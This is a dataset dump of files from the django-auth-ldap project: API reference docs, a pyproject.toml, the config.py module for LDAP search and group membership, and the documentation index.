.. method:: __init__(name_attr='cn')\n\n\n.. class:: GroupOfUniqueNamesType\n\n A concrete subclass of :class:`~django_auth_ldap.config.MemberDNGroupType`\n that handles the ``groupOfUniqueNames`` object class. Equivalent to\n ``MemberDNGroupType('uniqueMember')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: NestedGroupOfUniqueNamesType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.NestedMemberDNGroupType` that handles the\n ``groupOfUniqueNames`` object class. Equivalent to\n ``NestedMemberDNGroupType('uniqueMember')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: ActiveDirectoryGroupType\n\n A concrete subclass of :class:`~django_auth_ldap.config.MemberDNGroupType`\n that handles Active Directory groups. Equivalent to\n ``MemberDNGroupType('member')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: NestedActiveDirectoryGroupType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.NestedMemberDNGroupType` that handles\n Active Directory groups. Equivalent to\n ``NestedMemberDNGroupType('member')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: OrganizationalRoleGroupType\n\n A concrete subclass of :class:`~django_auth_ldap.config.MemberDNGroupType`\n that handles the ``organizationalRole`` object class. Equivalent to\n ``MemberDNGroupType('roleOccupant')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: NestedOrganizationalRoleGroupType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.NestedMemberDNGroupType` that handles the\n ``organizationalRole`` object class. Equivalent to\n ``NestedMemberDNGroupType('roleOccupant')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: LDAPGroupQuery\n\n Represents a compound query for group membership.\n\n This can be used to construct an arbitrarily complex group membership query\n with AND, OR, and NOT logical operators. Construct primitive queries with a\n group DN as the only argument. These queries can then be combined with the\n ``&``, ``|``, and ``~`` operators.\n\n This is used by certain settings, including\n :setting:`AUTH_LDAP_REQUIRE_GROUP` and\n :setting:`AUTH_LDAP_USER_FLAGS_BY_GROUP`. An example is shown in\n :ref:`limiting-access`.\n\n .. method:: __init__(group_dn)\n\n :param str group_dn: The distinguished name of a group to test for\n membership.\n\n\nBackend\n-------\n\n.. module:: django_auth_ldap.backend\n\n.. data:: populate_user\n\n This is a Django signal that is sent when clients should perform additional\n customization of a :class:`~django.contrib.auth.models.User` object. It is\n sent after a user has been authenticated and the backend has finished\n populating it, and just before it is saved. The client may take this\n opportunity to populate additional model fields, perhaps based on\n ``ldap_user.attrs``. This signal has two keyword arguments: ``user`` is the\n :class:`~django.contrib.auth.models.User` object and ``ldap_user`` is the\n same as ``user.ldap_user``. The sender is the\n :class:`~django_auth_ldap.backend.LDAPBackend` class.\n\n.. data:: ldap_error\n\n\n This is a Django signal that is sent when we receive an\n :exc:`ldap.LDAPError` exception. The signal has four keyword arguments:\n\n - ``context``: one of ``'authenticate'``, ``'get_group_permissions'``, or\n ``'populate_user'``, indicating which API was being called when the\n exception was caught.\n - ``user``: the Django user being processed (if available).\n - ``request``: the Django request object associated with the\n authentication attempt (if available).\n - ``exception``: the :exc:`~ldap.LDAPError` object itself.\n\n The sender is the :class:`~django_auth_ldap.backend.LDAPBackend` class (or\n subclass).\n\n.. class:: LDAPBackend\n\n :class:`~django_auth_ldap.backend.LDAPBackend` has one method that may be\n called directly and several that may be overridden in subclasses.\n\n .. data:: settings_prefix\n\n A prefix for all of our Django settings. By default, this is\n ``'AUTH_LDAP_'``, but subclasses can override this. When different\n subclasses use different prefixes, they can both be installed and\n operate independently.\n\n .. data:: default_settings\n\n A dictionary of default settings. This is empty in\n :class:`~django_auth_ldap.backend.LDAPBackend`, but subclasses can\n populate this with values that will override the built-in defaults. Note\n that the keys should omit the ``'AUTH_LDAP_'`` prefix.\n\n .. method:: populate_user(username)\n\n Populates the Django user for the given LDAP username. This connects to\n the LDAP directory with the default credentials and attempts to populate\n the indicated Django user as if they had just logged in.\n :setting:`AUTH_LDAP_ALWAYS_UPDATE_USER` is ignored (assumed ``True``).\n\n .. method:: get_user_model(self)\n\n Returns the user model that\n :meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user` will\n instantiate. By default, custom user models will be respected.\n Subclasses would most likely override this in order to substitute a\n :ref:`proxy model <proxy-models>`.\n\n .. method:: authenticate_ldap_user(self, ldap_user, password)\n\n Given an LDAP user object and password, authenticates the user and\n returns a Django user object. See :ref:`customizing-authentication`.\n\n .. method:: get_or_build_user(self, username, ldap_user)\n\n Given a username and an LDAP user object, this must return a valid\n Django user model instance. The ``username`` argument has already been\n passed through\n :meth:`~django_auth_ldap.backend.LDAPBackend.ldap_to_django_username`.\n You can get information about the LDAP user via ``ldap_user.dn`` and\n ``ldap_user.attrs``. The return value must be an (instance, created)\n two-tuple. The instance does not need to be saved.\n\n The default implementation looks for the username with a\n case-insensitive query; if it's not found, the model returned by\n :meth:`~django_auth_ldap.backend.LDAPBackend.get_user_model` will be\n created with the lowercased username. New users will not be saved to the\n database until after the :data:`django_auth_ldap.backend.populate_user`\n signal has been sent.\n\n A subclass may override this to associate LDAP users to Django users any\n way it likes.\n\n .. method:: ldap_to_django_username(username)\n\n Returns a valid Django username based on the given LDAP username (which\n is what the user enters). By default, ``username`` is returned\n unchanged. This can be overridden by subclasses.\n\n .. method:: django_to_ldap_username(username)\n\n The inverse of\n :meth:`~django_auth_ldap.backend.LDAPBackend.ldap_to_django_username`.\n If this is not symmetrical to\n :meth:`~django_auth_ldap.backend.LDAPBackend.ldap_to_django_username`,\n the behavior is undefined.\n" }, { "alpha_fraction": 0.6319867372512817, "alphanum_fraction": 0.6480354070663452, "avg_line_length": 29.627119064331055, "blob_id": "984a8a93f498ed8cbdd2eeae33b13994383dd815", "content_id": "4b8057d5432eb9e775b2861efcba7a7eff230444", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 1807, "license_type": "permissive", "max_line_length": 84, "num_lines": 59, "path": "/pyproject.toml", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "[project]\nname = \"django-auth-ldap\"\nrequires-python = \">=3.8\"\ndescription = \"Django LDAP authentication backend\"\nreadme = \"README.rst\"\nauthors = [\n { name=\"Peter Sagerson\", email=\"[email protected]\"},\n]\nmaintainers = [\n { name=\"François Freitag\", email=\"[email protected]\" },\n]\nlicense = { text=\"BSD\" }\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Web Environment\",\n \"Framework :: Django\",\n \"Framework :: Django :: 3.2\",\n \"Framework :: Django :: 4.1\",\n \"Framework :: Django :: 4.2\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: System :: Systems Administration :: Authentication/Directory :: LDAP\",\n]\ndynamic = [\"version\"]\n\ndependencies = [\n \"Django>=3.2\",\n \"python-ldap>=3.1\",\n]\n\n[project.urls]\nHomepage = \"https://github.com/django-auth-ldap/django-auth-ldap\"\nDocumentation = \"https://django-auth-ldap.readthedocs.io/\"\nSource = \"https://github.com/django-auth-ldap/django-auth-ldap\"\nTracker = \"https://github.com/django-auth-ldap/django-auth-ldap/issues\"\nChangelog = \"https://github.com/django-auth-ldap/django-auth-ldap/releases/\"\n\n[tool.isort]\nprofile = \"black\"\n\n[build-system]\nrequires = [\n \"setuptools>=42\",\n \"setuptools_scm[toml]>=3.4\",\n]\nbuild-backend = \"setuptools.build_meta\"\n\n[tool.setuptools_scm]\nwrite_to = \"django_auth_ldap/version.py\"\n" }, { "alpha_fraction": 0.6082210540771484, "alphanum_fraction": 0.6091006994247437, "avg_line_length": 31.521455764770508, "blob_id": "143a393eb1187fbc224bd775a4ac5a3c6997b505", "content_id": "6dcdefa8fa0028ac205116d052646e123481bb2a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25009, "license_type": "permissive", "max_line_length": 88, "num_lines": 769, "path": "/django_auth_ldap/config.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "# Copyright (c) 2009, Peter Sagerson\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# - Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# - Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\nThis module contains classes that will be needed for configuration of LDAP\nauthentication. Unlike backend.py, this is safe to import into settings.py.\nPlease see the docstring on the backend module for more information, including\nnotes on naming conventions.\n\"\"\"\n\nimport logging\nimport pprint\n\nimport ldap\nimport ldap.filter\nfrom django.conf import settings\nfrom django.utils.tree import Node\n\n\nclass ConfigurationWarning(UserWarning):\n pass\n\n\nclass LDAPSettings:\n \"\"\"\n This is a simple class to take the place of the global settings object. An\n instance will contain all of our settings as attributes, with default values\n if they are not specified by the configuration.\n \"\"\"\n\n _prefix = \"AUTH_LDAP_\"\n\n defaults = {\n \"ALWAYS_UPDATE_USER\": True,\n \"AUTHORIZE_ALL_USERS\": False,\n \"BIND_AS_AUTHENTICATING_USER\": False,\n \"REFRESH_DN_ON_BIND\": False,\n \"BIND_DN\": \"\",\n \"BIND_PASSWORD\": \"\",\n \"CONNECTION_OPTIONS\": {},\n \"DENY_GROUP\": None,\n \"FIND_GROUP_PERMS\": False,\n \"CACHE_TIMEOUT\": 0,\n \"GROUP_SEARCH\": None,\n \"GROUP_TYPE\": None,\n \"MIRROR_GROUPS\": None,\n \"MIRROR_GROUPS_EXCEPT\": None,\n \"PERMIT_EMPTY_PASSWORD\": False,\n \"REQUIRE_GROUP\": None,\n \"NO_NEW_USERS\": False,\n \"SERVER_URI\": \"ldap://localhost\",\n \"START_TLS\": False,\n \"USER_QUERY_FIELD\": None,\n \"USER_ATTRLIST\": None,\n \"USER_ATTR_MAP\": {},\n \"USER_DN_TEMPLATE\": None,\n \"USER_FLAGS_BY_GROUP\": {},\n \"USER_SEARCH\": None,\n }\n\n def __init__(self, prefix=\"AUTH_LDAP_\", defaults={}):\n \"\"\"\n Loads our settings from django.conf.settings, applying defaults for any\n that are omitted.\n \"\"\"\n self._prefix = prefix\n\n defaults = dict(self.defaults, **defaults)\n\n for name, default in defaults.items():\n value = getattr(settings, prefix + name, default)\n setattr(self, name, value)\n\n def _name(self, suffix):\n return self._prefix + suffix\n\n\nclass _LDAPConfig:\n \"\"\"\n A private class that loads and caches some global objects.\n \"\"\"\n\n logger = None\n\n _ldap_configured = False\n\n @classmethod\n def get_ldap(cls, global_options=None):\n \"\"\"\n Returns the configured ldap module.\n \"\"\"\n # Apply global LDAP options once\n if not cls._ldap_configured and global_options is not None:\n for opt, value in global_options.items():\n ldap.set_option(opt, value)\n\n cls._ldap_configured = True\n\n return ldap\n\n @classmethod\n def get_logger(cls):\n \"\"\"\n Initializes and returns our logger instance.\n \"\"\"\n if cls.logger is None:\n cls.logger = logging.getLogger(\"django_auth_ldap\")\n cls.logger.addHandler(logging.NullHandler())\n\n return cls.logger\n\n\n# Our global logger\nlogger = _LDAPConfig.get_logger()\n\n\nclass LDAPSearch:\n \"\"\"\n Public class that holds a set of LDAP search parameters. Objects of this\n class should be considered immutable. Only the initialization method is\n documented for configuration purposes. Internal clients may use the other\n methods to refine and execute the search.\n \"\"\"\n\n def __init__(self, base_dn, scope, filterstr=\"(objectClass=*)\", attrlist=None):\n \"\"\"\n These parameters are the same as the first three parameters to\n ldap.search_s.\n \"\"\"\n self.base_dn = base_dn\n self.scope = scope\n self.filterstr = filterstr\n self.attrlist = attrlist\n self.ldap = _LDAPConfig.get_ldap()\n\n def __repr__(self):\n return \"<{}: {}>\".format(type(self).__name__, self.base_dn)\n\n def search_with_additional_terms(self, term_dict, escape=True):\n \"\"\"\n Returns a new search object with additional search terms and-ed to the\n filter string. term_dict maps attribute names to assertion values. If\n you don't want the values escaped, pass escape=False.\n \"\"\"\n term_strings = [self.filterstr]\n\n for name, value in term_dict.items():\n if escape:\n value = self.ldap.filter.escape_filter_chars(value)\n term_strings.append(\"({}={})\".format(name, value))\n\n filterstr = \"(&{})\".format(\"\".join(term_strings))\n\n return type(self)(self.base_dn, self.scope, filterstr, attrlist=self.attrlist)\n\n def search_with_additional_term_string(self, filterstr):\n \"\"\"\n Returns a new search object with filterstr and-ed to the original filter\n string. The caller is responsible for passing in a properly escaped\n string.\n \"\"\"\n filterstr = \"(&{}{})\".format(self.filterstr, filterstr)\n\n return type(self)(self.base_dn, self.scope, filterstr, attrlist=self.attrlist)\n\n def execute(self, connection, filterargs=(), escape=True):\n \"\"\"\n Executes the search on the given connection (an LDAPObject). filterargs\n is an object that will be used for expansion of the filter string.\n If escape is True, values in filterargs will be escaped.\n\n The python-ldap library returns utf8-encoded strings. For the sake of\n sanity, this method will decode all result strings and return them as\n Unicode.\n \"\"\"\n if escape:\n filterargs = self._escape_filterargs(filterargs)\n\n try:\n filterstr = self.filterstr % filterargs\n logger.debug(\n \"Invoking search_s('%s', %s, '%s')\", self.base_dn, self.scope, filterstr\n )\n results = connection.search_s(\n self.base_dn, self.scope, filterstr, self.attrlist\n )\n except ldap.LDAPError as e:\n results = []\n logger.error(\n \"search_s('%s', %s, '%s') raised %s\",\n self.base_dn,\n self.scope,\n filterstr,\n pprint.pformat(e),\n )\n\n return self._process_results(results)\n\n def _begin(self, connection, filterargs=(), escape=True):\n \"\"\"\n Begins an asynchronous search and returns the message id to retrieve\n the results.\n\n filterargs is an object that will be used for expansion of the filter\n string. If escape is True, values in filterargs will be escaped.\n\n \"\"\"\n if escape:\n filterargs = self._escape_filterargs(filterargs)\n\n try:\n filterstr = self.filterstr % filterargs\n msgid = connection.search(\n self.base_dn, self.scope, filterstr, self.attrlist\n )\n except ldap.LDAPError as e:\n msgid = None\n logger.error(\n \"search('%s', %s, '%s') raised %s\",\n self.base_dn,\n self.scope,\n filterstr,\n pprint.pformat(e),\n )\n\n return msgid\n\n def _results(self, connection, msgid):\n \"\"\"\n Returns the result of a previous asynchronous query.\n \"\"\"\n try:\n kind, results = connection.result(msgid)\n if kind not in (ldap.RES_SEARCH_ENTRY, ldap.RES_SEARCH_RESULT):\n results = []\n except ldap.LDAPError as e:\n results = []\n logger.error(\"result(%s) raised %s\", msgid, pprint.pformat(e))\n\n return self._process_results(results)\n\n def _escape_filterargs(self, filterargs):\n \"\"\"\n Escapes values in filterargs.\n\n filterargs is a value suitable for Django's string formatting operator\n (%), which means it's either a tuple or a dict. This return a new tuple\n or dict with all values escaped for use in filter strings.\n\n \"\"\"\n if isinstance(filterargs, tuple):\n filterargs = tuple(\n self.ldap.filter.escape_filter_chars(value) for value in filterargs\n )\n elif isinstance(filterargs, dict):\n filterargs = {\n key: self.ldap.filter.escape_filter_chars(value)\n for key, value in filterargs.items()\n }\n else:\n raise TypeError(\"filterargs must be a tuple or dict.\")\n\n return filterargs\n\n def _process_results(self, results):\n \"\"\"\n Returns a sanitized copy of raw LDAP results. This scrubs out\n references, decodes utf8, normalizes DNs, etc.\n \"\"\"\n results = [r for r in results if r[0] is not None]\n results = _DeepStringCoder(\"utf-8\").decode(results)\n\n # The normal form of a DN is lower case.\n results = [(r[0].lower(), r[1]) for r in results]\n\n result_dns = [result[0] for result in results]\n logger.debug(\n \"search_s('%s', %s, '%s') returned %d objects: %s\",\n self.base_dn,\n self.scope,\n self.filterstr,\n len(result_dns),\n \"; \".join(result_dns),\n )\n\n return results\n\n\nclass LDAPSearchUnion:\n \"\"\"\n A compound search object that returns the union of the results. Instantiate\n it with one or more LDAPSearch objects.\n \"\"\"\n\n def __init__(self, *args):\n self.searches = args\n self.ldap = _LDAPConfig.get_ldap()\n\n def search_with_additional_terms(self, term_dict, escape=True):\n searches = [\n s.search_with_additional_terms(term_dict, escape) for s in self.searches\n ]\n\n return type(self)(*searches)\n\n def search_with_additional_term_string(self, filterstr):\n searches = [\n s.search_with_additional_term_string(filterstr) for s in self.searches\n ]\n\n return type(self)(*searches)\n\n def execute(self, connection, filterargs=(), escape=True):\n msgids = [\n search._begin(connection, filterargs, escape) for search in self.searches\n ]\n results = {}\n\n for search, msgid in zip(self.searches, msgids):\n if msgid is not None:\n result = search._results(connection, msgid)\n results.update(dict(result))\n\n return results.items()\n\n\nclass _DeepStringCoder:\n \"\"\"\n Encodes and decodes strings in a nested structure of lists, tuples, and\n dicts. This is helpful when interacting with the Unicode-unaware\n python-ldap.\n \"\"\"\n\n def __init__(self, encoding):\n self.encoding = encoding\n self.ldap = _LDAPConfig.get_ldap()\n\n def decode(self, value):\n try:\n if isinstance(value, bytes):\n value = value.decode(self.encoding)\n elif isinstance(value, list):\n value = self._decode_list(value)\n elif isinstance(value, tuple):\n value = tuple(self._decode_list(value))\n elif isinstance(value, dict):\n value = self._decode_dict(value)\n except UnicodeDecodeError:\n pass\n\n return value\n\n def _decode_list(self, value):\n return [self.decode(v) for v in value]\n\n def _decode_dict(self, value):\n # Attribute dictionaries should be case-insensitive. python-ldap\n # defines this, although for some reason, it doesn't appear to use it\n # for search results.\n decoded = self.ldap.cidict.cidict()\n\n for k, v in value.items():\n decoded[self.decode(k)] = self.decode(v)\n\n return decoded\n\n\nclass LDAPGroupType:\n \"\"\"\n This is an abstract base class for classes that determine LDAP group\n membership. A group can mean many different things in LDAP, so we will need\n a concrete subclass for each grouping mechanism. Clients may subclass this\n if they have a group mechanism that is not handled by a built-in\n implementation.\n\n name_attr is the name of the LDAP attribute from which we will take the\n Django group name.\n\n Subclasses in this file must use self.ldap to access the python-ldap module.\n This will be a mock object during unit tests.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n self.name_attr = name_attr\n self.ldap = _LDAPConfig.get_ldap()\n\n def user_groups(self, ldap_user, group_search):\n \"\"\"\n Returns a list of group_info structures, each one a group to which\n ldap_user belongs. group_search is an LDAPSearch object that returns all\n of the groups that the user might belong to. Typical implementations\n will apply additional filters to group_search and return the results of\n the search. ldap_user represents the user and has the following three\n properties:\n\n dn: the distinguished name\n attrs: a dictionary of LDAP attributes (with lists of values)\n connection: an LDAPObject that has been bound with credentials\n\n This is the primitive method in the API and must be implemented.\n \"\"\"\n return []\n\n def is_member(self, ldap_user, group_dn):\n \"\"\"\n This method is an optimization for determining group membership without\n loading all of the user's groups. Subclasses that are able to do this\n may return True or False. ldap_user is as above. group_dn is the\n distinguished name of the group in question.\n\n The base implementation returns None, which means we don't have enough\n information. The caller will have to call user_groups() instead and look\n for group_dn in the results.\n \"\"\"\n return None\n\n def group_name_from_info(self, group_info):\n \"\"\"\n Given the (DN, attrs) 2-tuple of an LDAP group, this returns the name of\n the Django group. This may return None to indicate that a particular\n LDAP group has no corresponding Django group.\n\n The base implementation returns the value of the cn attribute, or\n whichever attribute was given to __init__ in the name_attr\n parameter.\n \"\"\"\n try:\n name = group_info[1][self.name_attr][0]\n except (KeyError, IndexError):\n name = None\n\n return name\n\n\nALLOWED_LDAP_MEMBERSHIP_EXCEPTIONS = (\n ldap.UNDEFINED_TYPE, # Attribute does not exist in LDAP schema.\n ldap.NO_SUCH_ATTRIBUTE, # Attribute does not exist in the entry.\n ldap.NO_SUCH_OBJECT, # Group does not exist.\n)\n\n\nclass PosixGroupType(LDAPGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class posixGroup.\n \"\"\"\n\n def user_groups(self, ldap_user, group_search):\n \"\"\"\n Searches for any group that is either the user's primary or contains the\n user as a member.\n \"\"\"\n groups = []\n\n try:\n user_uid = ldap_user.attrs[\"uid\"][0]\n\n if \"gidNumber\" in ldap_user.attrs:\n user_gid = ldap_user.attrs[\"gidNumber\"][0]\n filterstr = \"(|(gidNumber={})(memberUid={}))\".format(\n self.ldap.filter.escape_filter_chars(user_gid),\n self.ldap.filter.escape_filter_chars(user_uid),\n )\n else:\n filterstr = \"(memberUid={})\".format(\n self.ldap.filter.escape_filter_chars(user_uid)\n )\n\n search = group_search.search_with_additional_term_string(filterstr)\n groups = search.execute(ldap_user.connection)\n except (KeyError, IndexError):\n pass\n\n return groups\n\n def is_member(self, ldap_user, group_dn):\n \"\"\"\n Returns True if the group is the user's primary group or if the user is\n listed in the group's memberUid attribute.\n \"\"\"\n try:\n user_uid = ldap_user.attrs[\"uid\"][0]\n\n try:\n is_member = ldap_user.connection.compare_s(\n group_dn, \"memberUid\", user_uid.encode()\n )\n except ALLOWED_LDAP_MEMBERSHIP_EXCEPTIONS:\n is_member = False\n\n if not is_member:\n try:\n user_gid = ldap_user.attrs[\"gidNumber\"][0]\n is_member = ldap_user.connection.compare_s(\n group_dn, \"gidNumber\", user_gid.encode()\n )\n except ALLOWED_LDAP_MEMBERSHIP_EXCEPTIONS:\n is_member = False\n except (KeyError, IndexError):\n is_member = False\n\n return is_member\n\n\nclass MemberDNGroupType(LDAPGroupType):\n \"\"\"\n A group type that stores lists of members as distinguished names.\n \"\"\"\n\n def __init__(self, member_attr, name_attr=\"cn\"):\n \"\"\"\n member_attr is the attribute on the group object that holds the list of\n member DNs.\n \"\"\"\n self.member_attr = member_attr\n\n super().__init__(name_attr)\n\n def __repr__(self):\n return \"<{}: {}>\".format(type(self).__name__, self.member_attr)\n\n def user_groups(self, ldap_user, group_search):\n search = group_search.search_with_additional_terms(\n {self.member_attr: ldap_user.dn}\n )\n return search.execute(ldap_user.connection)\n\n def is_member(self, ldap_user, group_dn):\n try:\n result = ldap_user.connection.compare_s(\n group_dn, self.member_attr, ldap_user.dn.encode()\n )\n except ALLOWED_LDAP_MEMBERSHIP_EXCEPTIONS:\n result = 0\n\n return result\n\n\nclass NestedMemberDNGroupType(LDAPGroupType):\n \"\"\"\n A group type that stores lists of members as distinguished names and\n supports nested groups. There is no shortcut for is_member in this case, so\n it's left unimplemented.\n \"\"\"\n\n def __init__(self, member_attr, name_attr=\"cn\"):\n \"\"\"\n member_attr is the attribute on the group object that holds the list of\n member DNs.\n \"\"\"\n self.member_attr = member_attr\n\n super().__init__(name_attr)\n\n def user_groups(self, ldap_user, group_search):\n \"\"\"\n This searches for all of a user's groups from the bottom up. In other\n words, it returns the groups that the user belongs to, the groups that\n those groups belong to, etc. Circular references will be detected and\n pruned.\n \"\"\"\n group_info_map = {} # Maps group_dn to group_info of groups we've found\n member_dn_set = {ldap_user.dn} # Member DNs to search with next\n handled_dn_set = set() # Member DNs that we've already searched with\n\n while len(member_dn_set) > 0:\n group_infos = self.find_groups_with_any_member(\n member_dn_set, group_search, ldap_user.connection\n )\n new_group_info_map = {info[0]: info for info in group_infos}\n group_info_map.update(new_group_info_map)\n handled_dn_set.update(member_dn_set)\n\n # Get ready for the next iteration. To avoid cycles, we make sure\n # never to search with the same member DN twice.\n member_dn_set = set(new_group_info_map.keys()) - handled_dn_set\n\n return group_info_map.values()\n\n def find_groups_with_any_member(self, member_dn_set, group_search, connection):\n terms = [\n \"({}={})\".format(self.member_attr, self.ldap.filter.escape_filter_chars(dn))\n for dn in member_dn_set\n ]\n\n filterstr = \"(|{})\".format(\"\".join(terms))\n search = group_search.search_with_additional_term_string(filterstr)\n\n return search.execute(connection)\n\n\nclass GroupOfNamesType(MemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class groupOfNames.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"member\", name_attr)\n\n\nclass NestedGroupOfNamesType(NestedMemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class groupOfNames with\n nested group references.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"member\", name_attr)\n\n\nclass GroupOfUniqueNamesType(MemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class groupOfUniqueNames.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"uniqueMember\", name_attr)\n\n\nclass NestedGroupOfUniqueNamesType(NestedMemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class groupOfUniqueNames\n with nested group references.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"uniqueMember\", name_attr)\n\n\nclass ActiveDirectoryGroupType(MemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles Active Directory groups.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"member\", name_attr)\n\n\nclass NestedActiveDirectoryGroupType(NestedMemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles Active Directory groups with nested\n group references.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"member\", name_attr)\n\n\nclass OrganizationalRoleGroupType(MemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class organizationalRole.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"roleOccupant\", name_attr)\n\n\nclass NestedOrganizationalRoleGroupType(NestedMemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class OrganizationalRoleGroupType\n with nested group references.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"roleOccupant\", name_attr)\n\n\nclass LDAPGroupQuery(Node):\n \"\"\"\n Represents a compound query for group membership.\n\n This can be used to construct an arbitrarily complex group membership query\n with AND, OR, and NOT logical operators. Construct primitive queries with a\n group DN as the only argument. These queries can then be combined with the\n ``&``, ``|``, and ``~`` operators.\n\n :param str group_dn: The DN of a group to test for membership.\n\n \"\"\"\n\n # Connection types\n AND = \"AND\"\n OR = \"OR\"\n default = AND\n\n _CONNECTORS = [AND, OR]\n\n def __init__(self, *args, **kwargs):\n super().__init__(children=list(args) + list(kwargs.items()))\n\n def __and__(self, other):\n return self._combine(other, self.AND)\n\n def __or__(self, other):\n return self._combine(other, self.OR)\n\n def __invert__(self):\n obj = type(self)()\n obj.add(self, self.AND)\n obj.negate()\n\n return obj\n\n def _combine(self, other, conn):\n if not isinstance(other, LDAPGroupQuery):\n raise TypeError(other)\n if conn not in self._CONNECTORS:\n raise ValueError(conn)\n\n obj = type(self)()\n obj.connector = conn\n obj.add(self, conn)\n obj.add(other, conn)\n\n return obj\n\n def resolve(self, ldap_user, groups=None):\n if groups is None:\n groups = ldap_user._get_groups()\n\n result = self.aggregator(self._resolve_children(ldap_user, groups))\n if self.negated:\n result = not result\n\n return result\n\n @property\n def aggregator(self):\n \"\"\"\n Returns a function for aggregating a sequence of sub-results.\n \"\"\"\n if self.connector == self.AND:\n aggregator = all\n elif self.connector == self.OR:\n aggregator = any\n else:\n raise ValueError(self.connector)\n\n return aggregator\n\n def _resolve_children(self, ldap_user, groups):\n \"\"\"\n Generates the query result for each child.\n \"\"\"\n for child in self.children:\n if isinstance(child, LDAPGroupQuery):\n yield child.resolve(ldap_user, groups)\n else:\n yield groups.is_member_of(child)\n" }, { "alpha_fraction": 0.6824073791503906, "alphanum_fraction": 0.6861110925674438, "avg_line_length": 24.11627960205078, "blob_id": "76a5377331b8e09fb461f274a5cbaa113b73c7a5", "content_id": "b0f177aa30d0748e0b4d1d9d0782e0e46238a0ca", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1080, "license_type": "permissive", "max_line_length": 79, "num_lines": 43, "path": "/docs/index.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "================================\nDjango Authentication Using LDAP\n================================\n\nThis is a Django authentication backend that authenticates against an LDAP\nservice. Configuration can be as simple as a single distinguished name\ntemplate, but there are many rich configuration options for working with users,\ngroups, and permissions.\n\n* Documentation: https://django-auth-ldap.readthedocs.io/\n* PyPI: https://pypi.org/project/django-auth-ldap/\n* Repository: https://github.com/django-auth-ldap/django-auth-ldap\n* License: BSD 2-Clause\n\nThis version is supported all supported version of `Python\n<https://www.python.org/downloads/>`_ and `Django\n<https://www.djangoproject.com/download/#supported-versions>`_. It requires\n`python-ldap`_ >= 3.1.\n\n.. toctree::\n :maxdepth: 2\n\n install\n authentication\n groups\n users\n permissions\n multiconfig\n custombehavior\n logging\n performance\n example\n reference\n changes\n contributing\n\n.. _`python-ldap`: 